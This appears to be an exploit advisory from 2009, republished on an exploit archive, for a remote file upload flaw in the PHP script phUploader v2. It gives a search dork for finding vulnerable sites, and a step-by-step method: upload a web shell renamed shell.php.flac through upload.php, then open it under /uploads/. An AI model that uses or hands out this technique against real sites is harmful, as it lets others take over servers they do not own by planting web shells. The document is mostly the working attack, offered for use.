id: 10339
date: 12/20/2009
title: phUploader Remote File Upload Vulnerability
author: wlhaan-hacker
cves: 

===========================================
phUploader Remote File Upload Vulnerability
===========================================

# Exploit Title: phUploader Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: wlhaan-hacker
#
# Version: v2
# CVE : [N/A]
 
==========================================================================
 
~ Script Name : phUploader)
~ Language : php
~
============================================================
 
Dork : Powered By phUploader
 
 
 
============================================================
Exploit :
 
 
 
http://{target}/script path/upload.php
 
chang shell
 
shell.php.flac
 
go to shell
 
http://{target}/script path/uploads/shell.php.flac
 
Exploit viduo
Download:
http://filaty.com/f/912/99431/up5.rar.html
============================================================



#  0day.today [2023-03-24]  #